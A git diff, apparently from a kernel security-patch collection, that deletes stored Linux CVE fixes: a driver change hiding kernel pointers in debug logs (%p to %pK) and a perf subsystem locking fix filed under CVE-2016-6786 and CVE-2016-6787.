- if (dev_context->mdt_devs.dev_touchscreen == NULL)
- return;
-
-- MHL_TX_DBG_INFO("Unregistering mouse: %p\n",
-+ MHL_TX_DBG_INFO("Unregistering mouse: %pK\n",
- dev_context->mdt_devs.dev_touchscreen);
- input_unregister_device(dev_context->mdt_devs.dev_touchscreen);
-- MHL_TX_DBG_INFO("Freeing mouse: %p\n",
-+ MHL_TX_DBG_INFO("Freeing mouse: %pK\n",
- dev_context->mdt_devs.dev_touchscreen);
- input_free_device(dev_context->mdt_devs.dev_touchscreen);
- dev_context->mdt_devs.dev_touchscreen = NULL;
-@@ -130,7 +131,7 @@ int init_mdt_keyboard(struct mhl_dev_context *dev_context)
- MHL_TX_DBG_ERR("Not enough memory\n");
- return -ENOMEM;
- }
-- MHL_TX_DBG_INFO("Allocated keyboard: %p\n", dev_keyboard);
-+ MHL_TX_DBG_INFO("Allocated keyboard: %pK\n", dev_keyboard);
-
- set_bit(EV_KEY, dev_keyboard->evbit);
- set_bit(EV_REP, dev_keyboard->evbit);
-@@ -158,7 +159,7 @@ int init_mdt_keyboard(struct mhl_dev_context *dev_context)
- return error;
- }
-
-- MHL_TX_DBG_INFO("Registered keyboard: %p\n", dev_keyboard);
-+ MHL_TX_DBG_INFO("Registered keyboard: %pK\n", dev_keyboard);
-
- dev_context->mdt_devs.dev_keyboard = dev_keyboard;
-
-@@ -175,7 +176,7 @@ int init_mdt_mouse(struct mhl_dev_context *dev_context)
- MHL_TX_DBG_ERR("Not enough memory\n");
- return -ENOMEM;
- }
-- MHL_TX_DBG_INFO("Allocated mouse: %p\n", dev_mouse);
-+ MHL_TX_DBG_INFO("Allocated mouse: %pK\n", dev_mouse);
-
- set_bit(EV_REL, dev_mouse->evbit);
- set_bit(EV_KEY, dev_mouse->evbit);
-@@ -208,7 +209,7 @@ int init_mdt_mouse(struct mhl_dev_context *dev_context)
- return error;
- }
-
-- MHL_TX_DBG_INFO("Registered mouse: %p\n", dev_mouse);
-+ MHL_TX_DBG_INFO("Registered mouse: %pK\n", dev_mouse);
-
- dev_context->mdt_devs.dev_mouse = dev_mouse;
-
-@@ -226,7 +227,7 @@ int init_mdt_touchscreen(struct mhl_dev_context *dev_context)
- return -ENOMEM;
- }
-
-- MHL_TX_DBG_INFO("Allocated touch screen: %p\n",
dev_touchscreen); -+ MHL_TX_DBG_INFO("Allocated touch screen: %pK\n", dev_touchscreen); - - #if !defined(SINGLE_TOUCH) && defined(KERNEL_2_6_38_AND_LATER) - input_mt_init_slots(dev_touchscreen, MAX_TOUCH_CONTACTS); -@@ -301,7 +302,7 @@ int init_mdt_touchscreen(struct mhl_dev_context *dev_context) - input_free_device(dev_touchscreen); - return error; - } -- MHL_TX_DBG_INFO("Registered touchscreen: %p\n", dev_touchscreen); -+ MHL_TX_DBG_INFO("Registered touchscreen: %pK\n", dev_touchscreen); - - dev_context->mdt_devs.dev_touchscreen = dev_touchscreen; - -diff --git a/drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c b/drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c -index fd6918f..0e7a35c 100644 ---- a/drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c -+++ b/drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c -@@ -1,7 +1,7 @@ - /* - * SiI8620 Linux Driver - * -- * Copyright (C) 2013-2014 Silicon Image, Inc. -+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc. - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License as -@@ -1118,7 +1118,7 @@ static void tx_prune_dtd_list(struct edid_3d_data_t *mhl_edid_3d_data, - if ((0 != p_desc->dtd.pixel_clock_low) || - (0 != p_desc->dtd.pixel_clock_high)) { - MHL_TX_EDID_INFO( -- "pix clock non-zero p_desc:%p", p_desc) -+ "pix clock non-zero p_desc:%pK", p_desc) - if ((0 == p_desc->dtd.horz_active_7_0) && - (0 == p_desc->dtd.horz_active_blanking_high. 
- horz_active_11_8)) { -@@ -1133,7 +1133,7 @@ static void tx_prune_dtd_list(struct edid_3d_data_t *mhl_edid_3d_data, - * one by one - */ - MHL_TX_EDID_INFO( -- "p_desc:%p p_next_desc:%p\n", -+ "p_desc:%pK p_next_desc:%pK\n", - p_desc, p_next_desc) - *p_desc++ = *p_next_desc++; - } -@@ -1144,7 +1144,7 @@ static void tx_prune_dtd_list(struct edid_3d_data_t *mhl_edid_3d_data, - p_desc = p_holder; - } else { - p_desc++; -- MHL_TX_EDID_INFO("p_desc:%p\n", p_desc) -+ MHL_TX_EDID_INFO("p_desc:%pK\n", p_desc) - } - } - } -@@ -1446,7 +1446,7 @@ static bool si_mhl_tx_parse_detailed_timing_descriptor( - * Mark this mode for pruning by setting - * horizontal active to zero - */ -- MHL_TX_DBG_ERR("%smark for pruning%s %p\n", -+ MHL_TX_DBG_ERR("%smark for pruning%s %pK\n", - ANSI_ESC_YELLOW_TEXT, - ANSI_ESC_RESET_TEXT, - p_desc); -@@ -1500,7 +1500,7 @@ static uint8_t si_mhl_tx_parse_861_long_descriptors( - ++mhl_edid_3d_data->parse_data. - num_cea_861_timing_dtds; - } else if (valid) { -- MHL_TX_EDID_INFO("stopping at %p\n", -+ MHL_TX_EDID_INFO("stopping at %pK\n", - p_data_u.p_long_descriptors) - break; - } -@@ -1600,7 +1600,7 @@ static void prune_hdmi_vsdb_vic_list( - HDMI_VIC_len = inner_loop_limit; - p_CEA_extension->byte_offset_to_18_byte_descriptors -= - num_HDMI_VICs_pruned; -- MHL_TX_EDID_INFO("%p\n", mhl_edid_3d_data->parse_data.p_HDMI_vsdb); -+ MHL_TX_EDID_INFO("%pK\n", mhl_edid_3d_data->parse_data.p_HDMI_vsdb); - if (mhl_edid_3d_data->parse_data.p_HDMI_vsdb) { - mhl_edid_3d_data->parse_data.p_HDMI_vsdb-> - header.fields.length_following_header -= -@@ -1722,8 +1722,7 @@ static void prune_svd_list( - ("\n\nInvalid extension size\n\n")); - while (pb_src < pb_limit) { - MHL_TX_EDID_INFO( -- "moving data up %p(0x%02X) " -- "<- %p(0x%02X)\n", -+ "moving data up %pK(0x%02X)<- %pK(0x%02X)\n", - pb_dest, (uint16_t)*pb_dest, - pb_src, (uint16_t)*pb_src); - *pb_dest++ = *pb_src++; -@@ -3123,7 +3122,7 @@ void si_mhl_tx_process_hev_vic_burst(struct edid_3d_data_t 
*mhl_edid_3d_data, - ANSI_ESC_RED_TEXT, ANSI_ESC_RESET_TEXT); - return; - } else { -- MHL_TX_DBG_WARN(" %d %p\n", hev_index, -+ MHL_TX_DBG_WARN(" %d %pK\n", hev_index, - mhl_edid_3d_data->hev_vic_list) - mhl_edid_3d_data->hev_vic_info. - num_items_allocated = -@@ -3136,7 +3135,7 @@ void si_mhl_tx_process_hev_vic_burst(struct edid_3d_data_t *mhl_edid_3d_data, - MHL_TX_DBG_ERR("bogus write burst, no hev_vic_list\n") - return; - } -- MHL_TX_DBG_WARN(" %d %p\n", hev_index, mhl_edid_3d_data->hev_vic_list) -+ MHL_TX_DBG_WARN(" %d %pK\n", hev_index, mhl_edid_3d_data->hev_vic_list) - if (NULL == mhl_edid_3d_data->hev_vic_list) { - MHL_TX_DBG_ERR("%s no place to put HEV_VIC burst%s\n", - ANSI_ESC_RED_TEXT, ANSI_ESC_RESET_TEXT); -@@ -3155,7 +3154,7 @@ void si_mhl_tx_process_hev_vic_burst(struct edid_3d_data_t *mhl_edid_3d_data, - burst_id_HEV_VIC, - (union video_burst_descriptor_u *) &p_burst-> - video_descriptors[i])) { -- MHL_TX_DBG_INFO(" %d %p\n", -+ MHL_TX_DBG_INFO(" %d %pK\n", - hev_index, mhl_edid_3d_data->hev_vic_list) - mhl_edid_3d_data->hev_vic_list[hev_index]. - mhl3_hev_vic_descriptor = -@@ -4036,7 +4035,7 @@ static uint8_t parse_861_block(struct edid_3d_data_t *mhl_edid_3d_data, - - mhl_edid_3d_data->parse_data.p_HDMI_vsdb = NULL; - -- MHL_TX_EDID_INFO("tag:place holder EDID block:%p\n", p_EDID_block_data); -+ MHL_TX_EDID_INFO("tag:place holdr EDID block:%pK\n", p_EDID_block_data); - if (EDID_EXTENSION_BLOCK_MAP == p_CEA_extension->tag) { - struct block_map_t *p_block_map; - int i; -@@ -4123,7 +4122,7 @@ void si_mhl_tx_handle_atomic_hw_edid_read_complete( - mhl_edid_3d_data->parse_data.num_EDID_extensions; - ++counter) { - MHL_TX_EDID_INFO -- (" counter:%d tag:place holder EDID block:%p\n", -+ (" counter:%d tag:place holder EDID block:%pK\n", - counter, - &mhl_edid_3d_data-> - EDID_block_data[EDID_BLOCK_SIZE * counter]); --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-6786/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6786/ANY/0001.patch
deleted file mode 100644
index 280b6064..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6786/ANY/0001.patch
+++ /dev/null
@@ -1,505 +0,0 @@
-From f63a8daa5812afef4f06c962351687e1ff9ccb2b Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra
-Date: Fri, 23 Jan 2015 12:24:14 +0100
-Subject: perf: Fix event->ctx locking
-
-There have been a few reported issues wrt. the lack of locking around
-changing event->ctx. This patch tries to address those.
-
-It avoids the whole rwsem thing; and while it appears to work, please
-give it some thought in review.
-
-What I did fail at is sensible runtime checks on the use of
-event->ctx, the RCU use makes it very hard.
-
-Signed-off-by: Peter Zijlstra (Intel)
-Cc: Paul E. McKenney
-Cc: Jiri Olsa
-Cc: Arnaldo Carvalho de Melo
-Cc: Linus Torvalds
-Link: http://lkml.kernel.org/r/20150123125834.209535886@infradead.org
-Signed-off-by: Ingo Molnar
----
- kernel/events/core.c | 244 +++++++++++++++++++++++++++++++++++++++++++--------
- 1 file changed, 207 insertions(+), 37 deletions(-)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index b358cb3..417a96b 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -907,6 +907,77 @@ static void put_ctx(struct perf_event_context *ctx)
- }
-
- /*
-+ * Because of perf_event::ctx migration in sys_perf_event_open::move_group and
-+ * perf_pmu_migrate_context() we need some magic.
-+ *
-+ * Those places that change perf_event::ctx will hold both
-+ * perf_event_ctx::mutex of the 'old' and 'new' ctx value.
-+ *
-+ * Lock ordering is by mutex address. There is one other site where
-+ * perf_event_context::mutex nests and that is put_event(). But remember that
-+ * that is a parent<->child context relation, and migration does not affect
-+ * children, therefore these two orderings should not interact.
-+ *
-+ * The change in perf_event::ctx does not affect children (as claimed above)
-+ * because the sys_perf_event_open() case will install a new event and break
-+ * the ctx parent<->child relation, and perf_pmu_migrate_context() is only
-+ * concerned with cpuctx and that doesn't have children.
-+ *
-+ * The places that change perf_event::ctx will issue:
-+ *
-+ * perf_remove_from_context();
-+ * synchronize_rcu();
-+ * perf_install_in_context();
-+ *
-+ * to affect the change. The remove_from_context() + synchronize_rcu() should
-+ * quiesce the event, after which we can install it in the new location. This
-+ * means that only external vectors (perf_fops, prctl) can perturb the event
-+ * while in transit. Therefore all such accessors should also acquire
-+ * perf_event_context::mutex to serialize against this.
-+ *
-+ * However; because event->ctx can change while we're waiting to acquire
-+ * ctx->mutex we must be careful and use the below perf_event_ctx_lock()
-+ * function.
-+ *
-+ * Lock order:
-+ * task_struct::perf_event_mutex
-+ * perf_event_context::mutex
-+ * perf_event_context::lock
-+ * perf_event::child_mutex;
-+ * perf_event::mmap_mutex
-+ * mmap_sem
-+ */
-+static struct perf_event_context *perf_event_ctx_lock(struct perf_event *event)
-+{
-+ struct perf_event_context *ctx;
-+
-+again:
-+ rcu_read_lock();
-+ ctx = ACCESS_ONCE(event->ctx);
-+ if (!atomic_inc_not_zero(&ctx->refcount)) {
-+ rcu_read_unlock();
-+ goto again;
-+ }
-+ rcu_read_unlock();
-+
-+ mutex_lock(&ctx->mutex);
-+ if (event->ctx != ctx) {
-+ mutex_unlock(&ctx->mutex);
-+ put_ctx(ctx);
-+ goto again;
-+ }
-+
-+ return ctx;
-+}
-+
-+static void perf_event_ctx_unlock(struct perf_event *event,
-+ struct perf_event_context *ctx)
-+{
-+ mutex_unlock(&ctx->mutex);
-+ put_ctx(ctx);
-+}
-+
-+/*
- * This must be done under the ctx->lock, such as to serialize against
- * context_equiv(), therefore we cannot call put_ctx() since that might end up
- * calling scheduler related locks and ctx->lock nests inside those.
-@@ -1666,7 +1737,7 @@ int __perf_event_disable(void *info)
- * is the current context on this CPU and preemption is disabled,
- * hence we can't get into perf_event_task_sched_out for this context.
- */
--void perf_event_disable(struct perf_event *event)
-+static void _perf_event_disable(struct perf_event *event)
- {
- struct perf_event_context *ctx = event->ctx;
- struct task_struct *task = ctx->task;
-@@ -1707,6 +1778,19 @@ retry:
- }
- raw_spin_unlock_irq(&ctx->lock);
- }
-+
-+/*
-+ * Strictly speaking kernel users cannot create groups and therefore this
-+ * interface does not need the perf_event_ctx_lock() magic.
-+ */
-+void perf_event_disable(struct perf_event *event)
-+{
-+ struct perf_event_context *ctx;
-+
-+ ctx = perf_event_ctx_lock(event);
-+ _perf_event_disable(event);
-+ perf_event_ctx_unlock(event, ctx);
-+}
- EXPORT_SYMBOL_GPL(perf_event_disable);
-
- static void perf_set_shadow_time(struct perf_event *event,
-@@ -2170,7 +2254,7 @@ unlock:
- * perf_event_for_each_child or perf_event_for_each as described
- * for perf_event_disable.
- */
--void perf_event_enable(struct perf_event *event)
-+static void _perf_event_enable(struct perf_event *event)
- {
- struct perf_event_context *ctx = event->ctx;
- struct task_struct *task = ctx->task;
-@@ -2226,9 +2310,21 @@ retry:
- out:
- raw_spin_unlock_irq(&ctx->lock);
- }
-+
-+/*
-+ * See perf_event_disable();
-+ */
-+void perf_event_enable(struct perf_event *event)
-+{
-+ struct perf_event_context *ctx;
-+
-+ ctx = perf_event_ctx_lock(event);
-+ _perf_event_enable(event);
-+ perf_event_ctx_unlock(event, ctx);
-+}
- EXPORT_SYMBOL_GPL(perf_event_enable);
-
--int perf_event_refresh(struct perf_event *event, int refresh)
-+static int _perf_event_refresh(struct perf_event *event, int refresh)
- {
- /*
- * not supported on inherited events
-@@ -2237,10 +2333,25 @@ int perf_event_refresh(struct perf_event *event, int refresh)
- return -EINVAL;
-
- atomic_add(refresh, &event->event_limit);
-- perf_event_enable(event);
-+ _perf_event_enable(event);
-
- return 0;
- }
-+
-+/*
-+ * See perf_event_disable()
-+ */
-+int perf_event_refresh(struct perf_event *event, int refresh)
-+{
-+ struct perf_event_context *ctx;
-+ int ret;
-+
-+ ctx = perf_event_ctx_lock(event);
-+ ret = _perf_event_refresh(event, refresh);
-+ perf_event_ctx_unlock(event, ctx);
-+
-+ return ret;
-+}
- EXPORT_SYMBOL_GPL(perf_event_refresh);
-
- static void ctx_sched_out(struct perf_event_context *ctx,
-@@ -3433,7 +3544,16 @@ static void perf_remove_from_owner(struct perf_event *event)
- rcu_read_unlock();
-
- if (owner) {
-- mutex_lock(&owner->perf_event_mutex);
-+ /*
-+ * If we're here through perf_event_exit_task() we're already
-+ * holding ctx->mutex which would be an inversion wrt. the
-+ * normal lock order.
-+ *
-+ * However we can safely take this lock because its the child
-+ * ctx->mutex.
-+ */
-+ mutex_lock_nested(&owner->perf_event_mutex, SINGLE_DEPTH_NESTING);
-+
- /*
- * We have to re-check the event->owner field, if it is cleared
- * we raced with perf_event_exit_task(), acquiring the mutex
-@@ -3559,12 +3679,13 @@ static int perf_event_read_group(struct perf_event *event,
- u64 read_format, char __user *buf)
- {
- struct perf_event *leader = event->group_leader, *sub;
-- int n = 0, size = 0, ret = -EFAULT;
- struct perf_event_context *ctx = leader->ctx;
-- u64 values[5];
-+ int n = 0, size = 0, ret;
- u64 count, enabled, running;
-+ u64 values[5];
-+
-+ lockdep_assert_held(&ctx->mutex);
-
-- mutex_lock(&ctx->mutex);
- count = perf_event_read_value(leader, &enabled, &running);
-
- values[n++] = 1 + leader->nr_siblings;
-@@ -3579,7 +3700,7 @@ static int perf_event_read_group(struct perf_event *event,
- size = n * sizeof(u64);
-
- if (copy_to_user(buf, values, size))
-- goto unlock;
-+ return -EFAULT;
-
- ret = size;
-
-@@ -3593,14 +3714,11 @@ static int perf_event_read_group(struct perf_event *event,
- size = n * sizeof(u64);
-
- if (copy_to_user(buf + ret, values, size)) {
-- ret = -EFAULT;
-- goto unlock;
-+ return -EFAULT;
- }
-
- ret += size;
- }
--unlock:
-- mutex_unlock(&ctx->mutex);
-
- return ret;
- }
-@@ -3672,8 +3790,14 @@ static ssize_t
- perf_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
- {
- struct perf_event *event = file->private_data;
-+ struct perf_event_context *ctx;
-+ int ret;
-
-- return perf_read_hw(event, buf, count);
-+ ctx = perf_event_ctx_lock(event);
-+ ret = perf_read_hw(event, buf, count);
-+ perf_event_ctx_unlock(event, ctx);
-+
-+ return ret;
- }
-
- static unsigned int perf_poll(struct file *file, poll_table *wait)
-@@ -3699,7 +3823,7 @@ static unsigned int perf_poll(struct file *file, poll_table *wait)
- return events;
- }
-
--static void perf_event_reset(struct perf_event *event)
-+static void _perf_event_reset(struct perf_event *event)
- {
- (void)perf_event_read(event);
- local64_set(&event->count, 0);
-@@ -3718,6 +3842,7 @@ static void perf_event_for_each_child(struct perf_event *event,
- struct perf_event *child;
-
- WARN_ON_ONCE(event->ctx->parent_ctx);
-+
- mutex_lock(&event->child_mutex);
- func(event);
- list_for_each_entry(child, &event->child_list, child_list)
-@@ -3731,14 +3856,13 @@ static void perf_event_for_each(struct perf_event *event,
- struct perf_event_context *ctx = event->ctx;
- struct perf_event *sibling;
-
-- WARN_ON_ONCE(ctx->parent_ctx);
-- mutex_lock(&ctx->mutex);
-+ lockdep_assert_held(&ctx->mutex);
-+
- event = event->group_leader;
-
- perf_event_for_each_child(event, func);
- list_for_each_entry(sibling, &event->sibling_list, group_entry)
- perf_event_for_each_child(sibling, func);
-- mutex_unlock(&ctx->mutex);
- }
-
- static int perf_event_period(struct perf_event *event, u64 __user *arg)
-@@ -3808,25 +3932,24 @@ static int perf_event_set_output(struct perf_event *event,
- struct perf_event *output_event);
- static int perf_event_set_filter(struct perf_event *event, void __user *arg);
-
--static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long _perf_ioctl(struct perf_event *event, unsigned int cmd, unsigned long arg)
- {
-- struct perf_event *event = file->private_data;
- void (*func)(struct perf_event *);
- u32 flags = arg;
-
- switch (cmd) {
- case PERF_EVENT_IOC_ENABLE:
-- func = perf_event_enable;
-+ func = _perf_event_enable;
- break;
- case PERF_EVENT_IOC_DISABLE:
-- func = perf_event_disable;
-+ func = _perf_event_disable;
- break;
- case PERF_EVENT_IOC_RESET:
-- func = perf_event_reset;
-+ func = _perf_event_reset;
- break;
-
- case PERF_EVENT_IOC_REFRESH:
-- return perf_event_refresh(event, arg);
-+ return _perf_event_refresh(event, arg);
-
- case PERF_EVENT_IOC_PERIOD:
- return perf_event_period(event, (u64 __user *)arg);
-@@ -3873,6 +3996,19 @@ static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- return 0;
- }
-
-+static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+ struct perf_event *event = file->private_data;
-+ struct perf_event_context *ctx;
-+ long ret;
-+
-+ ctx = perf_event_ctx_lock(event);
-+ ret = _perf_ioctl(event, cmd, arg);
-+ perf_event_ctx_unlock(event, ctx);
-+
-+ return ret;
-+}
-+
- #ifdef CONFIG_COMPAT
- static long perf_compat_ioctl(struct file *file, unsigned int cmd,
- unsigned long arg)
-@@ -3895,11 +4031,15 @@ static long perf_compat_ioctl(struct file *file, unsigned int cmd,
-
- int perf_event_task_enable(void)
- {
-+ struct perf_event_context *ctx;
- struct perf_event *event;
-
- mutex_lock(¤t->perf_event_mutex);
-- list_for_each_entry(event, ¤t->perf_event_list, owner_entry)
-- perf_event_for_each_child(event, perf_event_enable);
-+ list_for_each_entry(event, ¤t->perf_event_list, owner_entry) {
-+ ctx = perf_event_ctx_lock(event);
-+ perf_event_for_each_child(event, _perf_event_enable);
-+ perf_event_ctx_unlock(event, ctx);
-+ }
- mutex_unlock(¤t->perf_event_mutex);
-
- return 0;
-@@ -3907,11 +4047,15 @@ int perf_event_task_enable(void)
-
- int perf_event_task_disable(void)
- {
-+ struct perf_event_context *ctx;
- struct perf_event *event;
-
- mutex_lock(¤t->perf_event_mutex);
-- list_for_each_entry(event, ¤t->perf_event_list, owner_entry)
-- perf_event_for_each_child(event, perf_event_disable);
-+ list_for_each_entry(event, ¤t->perf_event_list, owner_entry) {
-+ ctx = perf_event_ctx_lock(event);
-+ perf_event_for_each_child(event, _perf_event_disable);
-+ perf_event_ctx_unlock(event, ctx);
-+ }
- mutex_unlock(¤t->perf_event_mutex);
-
- return 0;
-@@ -7269,6 +7413,15 @@ out:
- return ret;
- }
-
-+static void mutex_lock_double(struct mutex *a, struct mutex *b)
-+{
-+ if (b < a)
-+ swap(a, b);
-+
-+ mutex_lock(a);
-+ mutex_lock_nested(b, SINGLE_DEPTH_NESTING);
-+}
-+
- /**
- * sys_perf_event_open - open a performance event, associate it to a task/cpu
- *
-@@ -7284,7 +7437,7 @@ SYSCALL_DEFINE5(perf_event_open,
- struct perf_event *group_leader = NULL, *output_event = NULL;
- struct perf_event *event, *sibling;
- struct perf_event_attr attr;
-- struct perf_event_context *ctx;
-+ struct perf_event_context *ctx, *uninitialized_var(gctx);
- struct file *event_file = NULL;
- struct fd group = {NULL, 0};
- struct task_struct *task = NULL;
-@@ -7482,9 +7635,14 @@ SYSCALL_DEFINE5(perf_event_open,
- }
-
- if (move_group) {
-- struct perf_event_context *gctx = group_leader->ctx;
-+ gctx = group_leader->ctx;
-+
-+ /*
-+ * See perf_event_ctx_lock() for comments on the details
-+ * of swizzling perf_event::ctx.
-+ */
-+ mutex_lock_double(&gctx->mutex, &ctx->mutex);
-
-- mutex_lock(&gctx->mutex);
- perf_remove_from_context(group_leader, false);
-
- /*
-@@ -7499,15 +7657,19 @@ SYSCALL_DEFINE5(perf_event_open,
- perf_event__state_init(sibling);
- put_ctx(gctx);
- }
-- mutex_unlock(&gctx->mutex);
-- put_ctx(gctx);
-+ } else {
-+ mutex_lock(&ctx->mutex);
- }
-
- WARN_ON_ONCE(ctx->parent_ctx);
-- mutex_lock(&ctx->mutex);
-
- if (move_group) {
-+ /*
-+ * Wait for everybody to stop referencing the events through
-+ * the old lists, before installing it on new lists.
-+ */
- synchronize_rcu();
-+
- perf_install_in_context(ctx, group_leader, group_leader->cpu);
- get_ctx(ctx);
- list_for_each_entry(sibling, &group_leader->sibling_list,
-@@ -7519,6 +7681,11 @@ SYSCALL_DEFINE5(perf_event_open,
-
- perf_install_in_context(ctx, event, event->cpu);
- perf_unpin_context(ctx);
-+
-+ if (move_group) {
-+ mutex_unlock(&gctx->mutex);
-+ put_ctx(gctx);
-+ }
- mutex_unlock(&ctx->mutex);
-
- put_online_cpus();
-@@ -7626,7 +7793,11 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- src_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, src_cpu)->ctx;
- dst_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, dst_cpu)->ctx;
-
-- mutex_lock(&src_ctx->mutex);
-+ /*
-+ * See perf_event_ctx_lock() for comments on the details
-+ * of swizzling perf_event::ctx.
-+ */
-+ mutex_lock_double(&src_ctx->mutex, &dst_ctx->mutex);
- list_for_each_entry_safe(event, tmp, &src_ctx->event_list,
- event_entry) {
- perf_remove_from_context(event, false);
-@@ -7634,11 +7805,9 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- put_ctx(src_ctx);
- list_add(&event->migrate_entry, &events);
- }
-- mutex_unlock(&src_ctx->mutex);
-
- synchronize_rcu();
-
-- mutex_lock(&dst_ctx->mutex);
- list_for_each_entry_safe(event, tmp, &events, migrate_entry) {
- list_del(&event->migrate_entry);
- if (event->state >= PERF_EVENT_STATE_OFF)
-@@ -7648,6 +7817,7 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- get_ctx(dst_ctx);
- }
- mutex_unlock(&dst_ctx->mutex);
-+ mutex_unlock(&src_ctx->mutex);
- }
- EXPORT_SYMBOL_GPL(perf_pmu_migrate_context);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6787/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6787/ANY/0001.patch
deleted file mode 100644
index 280b6064..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6787/ANY/0001.patch
+++ /dev/null
@@ -1,505 +0,0 @@
-From f63a8daa5812afef4f06c962351687e1ff9ccb2b Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra
-Date: Fri, 23 Jan 2015 12:24:14 +0100
-Subject: perf: Fix event->ctx locking
-
-There have been a few reported issues wrt. the lack of locking around
-changing event->ctx. This patch tries to address those.
-
-It avoids the whole rwsem thing; and while it appears to work, please
-give it some thought in review.
-
-What I did fail at is sensible runtime checks on the use of
-event->ctx, the RCU use makes it very hard.
-
-Signed-off-by: Peter Zijlstra (Intel)
-Cc: Paul E. McKenney
-Cc: Jiri Olsa
-Cc: Arnaldo Carvalho de Melo
-Cc: Linus Torvalds
-Link: http://lkml.kernel.org/r/20150123125834.209535886@infradead.org
-Signed-off-by: Ingo Molnar
----
- kernel/events/core.c | 244 +++++++++++++++++++++++++++++++++++++++++++--------
- 1 file changed, 207 insertions(+), 37 deletions(-)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index b358cb3..417a96b 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -907,6 +907,77 @@ static void put_ctx(struct perf_event_context *ctx)
- }
-
- /*
-+ * Because of perf_event::ctx migration in sys_perf_event_open::move_group and
-+ * perf_pmu_migrate_context() we need some magic.
-+ *
-+ * Those places that change perf_event::ctx will hold both
-+ * perf_event_ctx::mutex of the 'old' and 'new' ctx value.
-+ *
-+ * Lock ordering is by mutex address. There is one other site where
-+ * perf_event_context::mutex nests and that is put_event(). But remember that
-+ * that is a parent<->child context relation, and migration does not affect
-+ * children, therefore these two orderings should not interact.
-+ *
-+ * The change in perf_event::ctx does not affect children (as claimed above)
-+ * because the sys_perf_event_open() case will install a new event and break
-+ * the ctx parent<->child relation, and perf_pmu_migrate_context() is only
-+ * concerned with cpuctx and that doesn't have children.
-+ *
-+ * The places that change perf_event::ctx will issue:
-+ *
-+ * perf_remove_from_context();
-+ * synchronize_rcu();
-+ * perf_install_in_context();
-+ *
-+ * to affect the change. The remove_from_context() + synchronize_rcu() should
-+ * quiesce the event, after which we can install it in the new location. This
-+ * means that only external vectors (perf_fops, prctl) can perturb the event
-+ * while in transit. Therefore all such accessors should also acquire
-+ * perf_event_context::mutex to serialize against this.
-+ *
-+ * However; because event->ctx can change while we're waiting to acquire
-+ * ctx->mutex we must be careful and use the below perf_event_ctx_lock()
-+ * function.
-+ *
-+ * Lock order:
-+ * task_struct::perf_event_mutex
-+ * perf_event_context::mutex
-+ * perf_event_context::lock
-+ * perf_event::child_mutex;
-+ * perf_event::mmap_mutex
-+ * mmap_sem
-+ */
-+static struct perf_event_context *perf_event_ctx_lock(struct perf_event *event)
-+{
-+ struct perf_event_context *ctx;
-+
-+again:
-+ rcu_read_lock();
-+ ctx = ACCESS_ONCE(event->ctx);
-+ if (!atomic_inc_not_zero(&ctx->refcount)) {
-+ rcu_read_unlock();
-+ goto again;
-+ }
-+ rcu_read_unlock();
-+
-+ mutex_lock(&ctx->mutex);
-+ if (event->ctx != ctx) {
-+ mutex_unlock(&ctx->mutex);
-+ put_ctx(ctx);
-+ goto again;
-+ }
-+
-+ return ctx;
-+}
-+
-+static void perf_event_ctx_unlock(struct perf_event *event,
-+ struct perf_event_context *ctx)
-+{
-+ mutex_unlock(&ctx->mutex);
-+ put_ctx(ctx);
-+}
-+
-+/*
- * This must be done under the ctx->lock, such as to serialize against
- * context_equiv(), therefore we cannot call put_ctx() since that might end up
- * calling scheduler related locks and ctx->lock nests inside those.
-@@ -1666,7 +1737,7 @@ int __perf_event_disable(void *info)
- * is the current context on this CPU and preemption is disabled,
- * hence we can't get into perf_event_task_sched_out for this context.
- */
--void perf_event_disable(struct perf_event *event)
-+static void _perf_event_disable(struct perf_event *event)
- {
- struct perf_event_context *ctx = event->ctx;
- struct task_struct *task = ctx->task;
-@@ -1707,6 +1778,19 @@ retry:
- }
- raw_spin_unlock_irq(&ctx->lock);
- }
-+
-+/*
-+ * Strictly speaking kernel users cannot create groups and therefore this
-+ * interface does not need the perf_event_ctx_lock() magic.
-+ */
-+void perf_event_disable(struct perf_event *event)
-+{
-+ struct perf_event_context *ctx;
-+
-+ ctx = perf_event_ctx_lock(event);
-+ _perf_event_disable(event);
-+ perf_event_ctx_unlock(event, ctx);
-+}
- EXPORT_SYMBOL_GPL(perf_event_disable);
-
- static void perf_set_shadow_time(struct perf_event *event,
-@@ -2170,7 +2254,7 @@ unlock:
- * perf_event_for_each_child or perf_event_for_each as described
- * for perf_event_disable.
- */
--void perf_event_enable(struct perf_event *event)
-+static void _perf_event_enable(struct perf_event *event)
- {
- struct perf_event_context *ctx = event->ctx;
- struct task_struct *task = ctx->task;
-@@ -2226,9 +2310,21 @@ retry:
- out:
- raw_spin_unlock_irq(&ctx->lock);
- }
-+
-+/*
-+ * See perf_event_disable();
-+ */
-+void perf_event_enable(struct perf_event *event)
-+{
-+ struct perf_event_context *ctx;
-+
-+ ctx = perf_event_ctx_lock(event);
-+ _perf_event_enable(event);
-+ perf_event_ctx_unlock(event, ctx);
